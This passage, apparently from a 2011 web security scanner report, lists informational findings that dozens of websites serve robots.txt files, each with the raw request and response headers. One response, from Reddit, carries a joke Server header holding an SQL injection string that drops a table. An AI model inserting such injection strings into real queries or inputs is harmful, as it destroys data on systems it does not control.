Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pokerstars.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:56 GMT
Server: Apache
Last-Modified: Fri, 18 Mar 2011 18:10:48 GMT
ETag: "13c-b28a5a00"
Accept-Ranges: bytes
Content-Length: 316
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /it/
Disallow: /sites/
Disallow: /bg/sites/
Disallow: /da/sites/
Disallow: /de/sites/
Disallow: /fi/sites/
Disallow: /fr/sites/
Disallow: /hu/sites/
Disallow: /nl/sites/
Disall
...[SNIP]...

24.666. http://www.politico.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politico.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.politico.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.6 (Fedora)
Last-Modified: Tue, 18 Nov 2008 21:19:00 GMT
ETag: "d2cc08-158-3e7bd900"
Content-Type: text/plain
Cache-Control: max-age=300
Expires: Sat, 02 Apr 2011 13:31:55 GMT
Date: Sat, 02 Apr 2011 13:26:55 GMT
Content-Length: 344
Connection: close

Sitemap: http://www.politico.com/sitemap_index.xml
Sitemap: http://www.politico.com/sitemap_googlenews.xml
Sitemap: http://www.politico.com/sitemap_news.xml
User-agent: *
Disallow: /2step
Disallo
...[SNIP]...

24.667. http://www.politicsdaily.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.politicsdaily.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.politicsdaily.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:08 GMT
Server: Apache/2.2
Accept-Ranges: bytes
Content-Length: 157
Keep-Alive: timeout=5, max=999916
Connection: Keep-Alive
Content-Type: text/plain

User-agent: *
Disallow: /forward/
Disallow: /mm_track/
Disallow: /omni_track/
Disallow: /search/
Sitemap: http://www.politicsdaily.com/sitemap_index.xml

24.668. http://www.pollmonkey.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pollmonkey.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pollmonkey.com

Response

HTTP/1.1 200 OK
Content-Length: 62
Content-Type: text/plain
Last-Modified: Fri, 15 Jul 2005 04:29:04 GMT
Accept-Ranges: bytes
ETag: "0a842bbf588c51:56a"
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:53:04 GMT
Connection: close
X-Powered-By: Bananas and Rum
X-Monkey-Sign: Invisible Monkeys

# go away
User-agent: *
Disallow: /images
Disallow: /global

24.669. http://www.polyvore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.polyvore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.polyvore.com

Response

HTTP/1.1 200 OK
Server: Polyvore Web Server
Date: Sat, 02 Apr 2011 13:41:54 GMT
Content-Type: text/plain; charset=UTF-8
Connection: close
Last-Modified: Fri, 01 Apr 2011 21:25:42 GMT
Accept-Ranges: bytes
Content-Length: 585
Vary: Accept-Encoding

Sitemap: http://www.polyvore.com/siteindex.xml.gz

User-agent: *
Disallow: /cgi/search
Allow: /cgi/shop.browse
Disallow: /cgi/shop
Disallow: /cgi/login
Disallow: /cgi/register
Disallow: /cgi/activity

...[SNIP]...

24.670. http://www.popcap.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popcap.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popcap.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Content-Type: text/plain
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:40:42 GMT
Last-Modified: Wed, 21 Apr 2010 22:48:30 GMT
ETag: "1058f11-5a-4bcf80be"
X-Cacheable: NO: !beresp.cacheable
Content-Length: 90
Date: Sat, 02 Apr 2011 13:40:41 GMT
X-Varnish: 1879751055
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-IP: .72
X-Cache: MISS

User-Agent: *
Disallow: /microsite/blitzpc/

Sitemap: http://www.popcap.com/sitemap.xml

24.671. http://www.poptropica.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.poptropica.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.poptropica.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Cache-Control: max-age=900
Date: Thu, 09 Dec 2010 19:16:35 GMT
Server: TUX/2.0 (Linux)
Content-Length: 78
Accept-Ranges: bytes
Last-Modified: Thu, 18 Nov 2010 18:53:46 GMT

User-agent: *
Disallow: *.swf

Sitemap: http://www.poptropica.com/sitemap.xml

24.672. http://www.popularscreensavers.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.popularscreensavers.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popularscreensavers.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache/2.2.11 (Unix) mod_ssl/2.2.11 OpenSSL/0.9.8c DAV/2 mod_jk/1.2.28
ETag: W/"113-1301508774000"
Last-Modified: Wed, 30 Mar 2011 18:12:54 GMT
Content-Length: 113
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /dl/firefox_install.jhtml
Disallow: /dl/manual_install.jhtml
Disallow: /dl/error.jhtml

24.673. http://www.potterybarn.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.potterybarn.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.potterybarn.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
ETag: W/"328-1301028802000"
Last-Modified: Fri, 25 Mar 2011 04:53:22 GMT
Content-Type: text/plain; charset=UTF-8
Content-Length: 328
Expires: Sat, 02 Apr 2011 13:56:58 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:56:58 GMT
Connection: close
Set-Cookie: PBDPWWW-EC=R4233357277; expires=Sun, 03-Apr-2011 14:02:11 GMT; domain=.potterybarn.com; path=/
Set-Cookie: WSPFY=179ed7406c5f00002a2b974d47af01009d500000; expires=Mon, 1-Jan-2024 00:00:01 GMT; path=/; domain=.potterybarn.com

#
# robots.txt - Pottery Barn http://www.potterybarn.com
# Modified 2009-03-05
#
User-agent: *
Disallow: /account/
Disallow: /checkout/
Disallow: /shoppingcart/
Disallow: /services/
Disallow: /shop_g/
...[SNIP]...

24.674. http://www.pricegong.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pricegong.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pricegong.com

Response

HTTP/1.1 200 OK
Content-Length: 23
Content-Type: text/plain
Last-Modified: Mon, 05 Jan 2009 21:49:01 GMT
Accept-Ranges: bytes
ETag: "fd98ea6b7f6fc91:6801"
Server: Microsoft-IIS/6.0
X-Server-Name: WEB01
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:05:06 GMT
Connection: close

User-Agent: *
Allow: /

24.675. http://www.primarygames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.primarygames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.primarygames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:18:41 GMT
Server: Apache/2.2.12 (Unix) mod_ssl/2.2.12 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.10
Last-Modified: Mon, 16 Nov 2009 02:10:39 GMT
ETag: "30b0661-4b-47873840f25c0"
Accept-Ranges: bytes
Content-Length: 75
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /images/
Disallow: /*.swf$

24.676. http://www.prlog.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.prlog.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.prlog.org

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:54:49 GMT
Server: Apache
Set-Cookie: SID=0iveul5e0e12r8b4bf9bf6s0t0; expires=Mon, 02 May 2011 13:54:49 GMT; path=/; domain=prlog.org
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent:*
Crawl-delay:60
Disallow:/report-spam.html
Disallow:/report-abuse.html
Disallow:/share.html
Disallow:/email-friend.html
Disallow:/email-contact.html
Disallow:/email.png

24.677. http://www.progressive.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.progressive.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.progressive.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:45:03 GMT
Content-Type: text/plain
Content-Location: http://www.progressive.com/robots.txt
Last-Modified: Thu, 18 Feb 2010 15:30:55 GMT
Accept-Ranges: bytes
ETag: "80a16e5cafb0ca1:ca5"
Server: Microsoft-IIS/6.0
P3P: CP = "CUR ADM DEV TAI PSA PSD IVAo IVDo CONo OUR OTRo IND DSP COR CAO PHY ONL UNI PUR COM FIN NAV INT DEM CNT STA GOV OTC" policyref="http://www.progressive.com/w3c/p3p.xml"
X-Powered-By: ASP.NET
Set-Cookie: SITESERVER=ID=a7b1eb5f83824ffcaa210e5e6b09d47e; path=/; domain=.progressive.com; expires=Sun, 31 Dec 2034 00:00:00 GMT
Set-Cookie: TLTSID=40B4DBAF49BEAD99184336AE545FEDA8; Domain=.progressive.com; path=/
Set-Cookie: TLTHID=40B4DBAF49BEAD99184336AE545FEDA8; Domain=.progressive.com; path=/
Set-Cookie: TLTUID=40B4DBAF49BEAD99184336AE545FEDA8; Domain=.progressive.com; path=/; expires=Sat, 02-04-2021 13:45:03 GMT
Content-Length: 432

User-agent:*
Disallow:/*?PrintFlag=Y$
Disallow:/insurance/
Disallow:/copyright.aspx$
Disallow:/privacy.aspx$
Disallow:/email-fraud.aspx$
Disallow:/protect-id.aspx$
Disallow:/site-security.aspx$
...[SNIP]...

24.678. http://www.pronto.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.pronto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.pronto.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:23:44 GMT
Server: Apache/2.2.4 (Fedora)
ETag: W/"235-1264110230000"
Last-Modified: Thu, 21 Jan 2010 21:43:50 GMT
Content-Length: 235
Content-Type: text/plain;charset=UTF-8
Set-Cookie: JSESSIONID=72E1100BAF08A5EF48E11BC7536E560C; Path=/
Set-Cookie: SESSIONID=-1477749844; Path=/
Set-Cookie: abt=ProntoV3_5_7-1.185-cellNum_2; Expires=Mon, 02-May-2011 13:23:44 GMT; Path=/
Set-Cookie: M_ID=61cadb32-12f16513672-11f3; Expires=Mon, 01-Apr-2013 13:23:44 GMT; Path=/
Set-Cookie: V_ID=61cadb32-12f16513672-11f4; Path=/
_eep-Alive: timeout=15
_onnection: Keep-Alive
Via: CN-5000
Connection: close

User-agent: Sosospider
Disallow: /

User-agent: *
Disallow: /user/
Disallow: /client/
Disallow: /account/
Disallow: /images/
Disallow: /js/
Disallow: /css-global/
Disallow: /css-local/

Sitemap: http:
...[SNIP]...

24.679. http://www.psu.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.psu.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.psu.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:04:02 GMT
Server: Apache/1.3.37 (Unix)
Last-Modified: Tue, 04 Mar 2003 19:00:12 GMT
ETag: "1918-be-3e64f7bc"
Accept-Ranges: bytes
Content-Length: 190
Connection: close
Content-Type: text/plain

# Added 09/19/2000
User-agent: *
Disallow: /dept/nat/lifeguard/
Disallow: /ur/test/
# Added 03/04/2003
Disallow: /bulletins/bluebook/courses.old/
Disallow: /bulletins/whitebook/courses.old/

24.680. http://www.publicrecords.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.publicrecords.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.publicrecords.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:35:55 GMT
Server: Microsoft-IIS/7.5
Content-Type: text/plain
Last-Modified: Wed, 08 Dec 2010 01:00:35 GMT
Accept-Ranges: bytes
ETag: "30b33c527396cb1:0"
X-Powered-By: ASP.NET
Content-Length: 87
Vary: Accept-Encoding
Connection: close

# Robots.txt for www.PublicRecords.com

User-agent: *
Disallow: /search-results-link

24.681. http://www.purdue.edu/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purdue.edu
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purdue.edu

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:00:36 GMT
Server: IBM_HTTP_Server
Last-Modified: Wed, 17 May 2006 15:12:33 GMT
ETag: "e8251-b6-59515a40"
Accept-Ranges: bytes
Content-Length: 182
Connection: close
Content-Type: text/plain
Set-Cookie: BIGipServerPool_old-PPWC_all=1713023168.0.0000; path=/

User-agent: *
Disallow: /~
Disallow: /wai/pdf/

User-agent: Googlebot
Disallow: /wai

User-agent: Slurp
Disallow: /wai

User-agent: *
Disallow: /bscompt/Projects/AribaUpgrade



24.682. http://www.purplemath.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.purplemath.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.purplemath.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:19:30 GMT
Server: Apache/2.2.16 (Unix) mod_ssl/2.2.16 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 PHP/5.2.14
Last-Modified: Mon, 03 Dec 2007 21:20:05 GMT
ETag: "1fd64-591-44068596dff00"
Accept-Ranges: bytes
Content-Length: 1425
Connection: close
Content-Type: text/plain

User-agent: Googlebot-Image
Disallow: /

User-agent: Yahoo-MMAudVid
Disallow: /

User-agent: Yahoo-MMCrawler
Disallow: /

User-agent: psbot
Disallow: /

User-agent: Fasterfox
Disallow: /

User-agent:
...[SNIP]...

24.683. http://www.qualityhealth.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualityhealth.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qualityhealth.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 02 Feb 2011 19:19:43 GMT
ETag: "5b-49b5187fcf1c0"
P3P: policyref="http://www.qualityhealth.com/p3p/p3p.xml", CP="NOI CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Content-Type: text/plain; charset=ISO-8859-1
Cache-Control: max-age=3600
Date: Sat, 02 Apr 2011 13:51:41 GMT
Content-Length: 91
Connection: close
Set-Cookie: AKAMAIID=a4f3f748bb190000ed29974d4ee90c0063ac0000; path=/; domain=www.qualityhealth.com

User-agent: *
Crawl-delay: 5
Disallow: /resources/javascript/
Disallow: /resources/styles/

24.684. http://www.qualtrics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qualtrics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qualtrics.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:56:08 GMT
Server: Apache/2.2.11 (FreeBSD)
X-Pingback: http://www.qualtrics.com/q1/xmlrpc.php
Cache-Control: max-age=315360000
Expires: Tue, 30 Mar 2021 13:56:08 GMT
Vary: Accept-Encoding
P3P: CP="CAO DSP COR CURa ADMa DEVa OUR IND PHY ONL UNI COM NAV INT DEM PRE"
ServerAddr: 192.168.1.8
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

24.685. http://www.questia.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.questia.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.questia.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:15:38 GMT
Accept-Ranges: bytes
ETag: W/"83-1300281623000"
Last-Modified: Wed, 16 Mar 2011 13:20:23 GMT
Content-Type: text/plain
Content-Length: 83
Vary: Accept-Encoding
Connection: close

User-agent: *
Disallow: /pageView/
Disallow: /pageView/htmlreader/
Crawl-delay: 10

24.686. http://www.quotegarden.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.quotegarden.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.quotegarden.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:59:07 GMT
Server: Apache
Last-Modified: Tue, 14 Sep 2010 01:51:30 GMT
Accept-Ranges: bytes
Content-Length: 213
Connection: close
Content-Type: text/plain

User-agent: Mediapartners-Google*
Disallow:

User-agent: *
Disallow: /cgi-bin/
Disallow: /wwwstat/
Disallow: /webmail/
Disallow: /cpanel

User-agent: ia_archiver
Disallow: /

User-agent: AboutUsBot
...[SNIP]...

24.687. http://www.qwest.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.qwest.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.qwest.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:36:30 GMT
Server: Apache
Set-Cookie: TLTHID=3777B7FE5D2E105D0016DAF664787EDF; Path=/; Domain=.qwest.com
Set-Cookie: TLTSID=3777B7FE5D2E105D0016DAF664787EDF; Path=/; Domain=.qwest.com
Last-Modified: Mon, 15 Nov 2010 15:57:06 GMT
Accept-Ranges: bytes
Content-Length: 5557
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

# Robots.txt -- robot exclusions
#
# See http://www.robotstxt.org/wc/norobots.html for details of the standard.
#
# *DO NOT MODIFY* this file without giving prior notification of the Online
# Customer
...[SNIP]...

24.688. http://www.radioshack.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.radioshack.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.radioshack.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:43:13 GMT
Server: Apache/2.0.63 (Unix)
Last-Modified: Mon, 03 Nov 2008 08:31:55 GMT
ETag: "4d8395-11c-45ac4c78f74c0"
Accept-Ranges: bytes
Content-Length: 284
Cache-Control: max-age=172800
Expires: Mon, 04 Apr 2011 13:43:13 GMT
Vary: Accept-Encoding
X-UA-Compatible: IE=EmulateIE7
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /cart/
Disallow: /coreg/
Disallow: /compare/
Disallow: /include/
Disallow: /emailHandler/
Disallow: /graphics/
Disallow: /css/
Disallow: /emergency/
Disallow: /images/
...[SNIP]...

24.689. http://www.rawtube.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rawtube.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rawtube.com

Response

HTTP/1.1 200 OK
Server: Apache/2.2.3 (CentOS)
Last-Modified: Thu, 22 Apr 2010 22:33:15 GMT
ETag: "9473-549-484dae580c0c0"
Content-Type: text/plain; charset=UTF-8
Content-Length: 1353
Via: www.rawtube.com
Date: Sat, 02 Apr 2011 12:32:31 GMT
X-Varnish: 863747473 863566912
Age: 712
Via: 1.1 varnish
Connection: close

# Robots.txt file by the great one
#
User-agent: *
Disallow: /free_lifetime_membership_fs.php
Disallow: /free_lifetime_membership.php
Disallow: /limit.php
Disallow: /2257.html
Disallow: /foreig
...[SNIP]...

24.690. http://www.reachlocal.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reachlocal.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reachlocal.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:58:35 GMT
Server: Apache
Last-Modified: Fri, 15 Oct 2010 22:21:23 GMT
ETag: "6c5-492af3f227ec0"
Accept-Ranges: bytes
Content-Length: 1733
Cache-Control: max-age=1209600
Expires: Sat, 16 Apr 2011 13:58:35 GMT
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
Content-Type: text/plain

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

24.691. http://www.realage.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realage.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realage.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Length: 673
Content-Type: text/plain
Cache-Control: max-age=524
Date: Sat, 02 Apr 2011 13:34:44 GMT
Connection: close

User-agent: *
Crawl-delay: 20
Disallow: /ams/
Disallow: /admin/
Disallow: /cgi-bin/
Disallow: /contribute/
Disallow: /comments/
Disallow: /registration/
Disallo
...[SNIP]...

24.692. http://www.realsimple.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realsimple.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realsimple.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:09 GMT
Server: Apache
Last-Modified: Fri, 06 Feb 2009 17:38:19 GMT
ETag: "424115-e6-462437c9038c0"
Accept-Ranges: bytes
Content-Length: 230
Content-Type: text/plain
Vary: X-Catmap-Header
P3P: CP='PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE CUR ADMa DEVa TAIo PSAo PSDo IVAo IVDo CONo TELo OTPi OUR UNRo PUBi OTRo IND DSP CAO COR'
Connection: close

Sitemap: http://www.realsimple.com/realsimple_sitemap.index
User-agent: *
Disallow: http://cgi.timeinc.net/cgi-bin/mail/dnp/privacy_centralized.cgi/realsimple?dnp_source=E
Disallow: https://secure.cus
...[SNIP]...

24.693. http://www.realtor.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.realtor.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.realtor.com

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-Powered-By: ASP.NET
Connection: keep-alive
Date: Sat, 02 Apr 2011 13:33:03 GMT
Content-Type: text/plain
Accept-Ranges: bytes
Last-Modified: Thu, 17 Feb 2011 18:24:38 GMT
ETag: "03763efcfcecb1:dd5"
Content-Length: 2716

User-agent: *
Disallow: /app_data
Disallow: /app_data/
Disallow: /App_Data
Disallow: /App_Data/
Disallow: /assist
Disallow: /assist/
Disallow: /Assist/
Disallow: /Assist
Disallow: /diagnostic
...[SNIP]...

24.694. http://www.redbox.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redbox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redbox.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Wed, 23 Mar 2011 18:00:37 GMT
Accept-Ranges: bytes
ETag: "396c893684e9cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 103
Date: Sat, 02 Apr 2011 13:39:36 GMT
Connection: close

...User-agent: *
Disallow: /account
Disallow: /feeds
Disallow: /cart
Allow: /

Crawl-delay: 5


24.695. http://www.reddit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reddit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reddit.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 04 Jan 2011 21:54:18 GMT
ETag: 1294178058.0-400
Server: '; DROP TABLE servertypes; --
Date: Sat, 02 Apr 2011 13:25:31 GMT
Content-Length: 400
Connection: close

# 80legs
User-agent: 008
Disallow: /

# MSNBot
User-Agent: msnbot
Crawl-Delay: 20

User-Agent: bender
Disallow: /my_shiny_metal_ass

User-Agent: Gort
Disallow: /earth

User-Agent: *
Disallow: /api
Dis
...[SNIP]...

24.696. http://www.redorbit.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.redorbit.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.redorbit.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:39 GMT
Server: Apache
Last-Modified: Tue, 01 Mar 2011 13:49:47 GMT
Accept-Ranges: bytes
Content-Length: 234
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Allow: /
Disallow: /modules/yellowbrix
Disallow: /modules/edit
Disallow: /modules/news/tools.php
Disallow: /modules/imglib/download.php
Disallow: /news/archive/
Sitemap: http://www.redor
...[SNIP]...

24.697. http://www.reference.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.reference.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.reference.com

Response

HTTP/1.0 200 OK
Server: Apache
Content-Type: text/plain;charset=UTF-8
Date: Sat, 02 Apr 2011 12:37:38 GMT
Content-Length: 602
Connection: close

User-agent: Googlebot
Disallow:

User-agent: googlebot-image
Disallow:

User-agent: googlebot-mobile
Disallow:

User-agent: MSNBot
Disallow:

User-agent: Slurp
Disallow:

User-agen
...[SNIP]...

24.698. http://www.regions.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.regions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.regions.com

Response

HTTP/1.1 200 OK
Set-Cookie: www.regions.com-http=R1402660298; path=/
Content-Length: 41
Content-Type: text/plain
Last-Modified: Fri, 01 Aug 2008 19:11:07 GMT
Accept-Ranges: bytes
ETag: "7727255aaf4c81:8ecc"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:34:34 GMT
Connection: close

User-agent: *
Disallow: \VirtualMedia\

24.699. http://www.registrydefender.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.registrydefender.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.registrydefender.com

Response

HTTP/1.1 200 OK
Content-Length: 163
Content-Type: text/plain
Last-Modified: Thu, 29 Jan 2009 20:57:11 GMT
Accept-Ranges: bytes
ETag: "c0df1d285482c91:1c36"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:55:46 GMT
Connection: close

User-agent: *
Disallow: /l/
Disallow: /c/
Disallow: /n/
Disallow: /charge/
Disallow: /reglanding/
Disallow: /include/

User-agent: ia_archiver
Disallow: /

24.700. http://www.rei.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rei.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.rei.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 08 Mar 2011 21:39:01 GMT
Cache-Control: public, max-age=600, must-revalidate
Expires: Wed, 30 Mar 2011 16:21:32 GMT
P3P: policyref="http://www.rei.com/w3c/p3p.xml", CP="CAO DSP COR CURa ADMi TAIi IVDo CONo OUR DELa SAMo STP PHY PUR COM NAV INT STA PRE GOV"
Content-Type: text/plain;charset=UTF-8
Content-Language: en-US
Date: Sat, 02 Apr 2011 13:55:41 GMT
Content-Length: 1136
Connection: close

User-agent: *
Disallow: /email/
Disallow: /EmployeeNewsletter/
Disallow: /gearmail/
Disallow: /jspConfig/
Disallow: /kiosk/
Disallow: /test/
Disallow: /ShoppingCart*
Disallow: /YourAccountLogi
...[SNIP]...

24.701. http://www.rent.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.rent.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

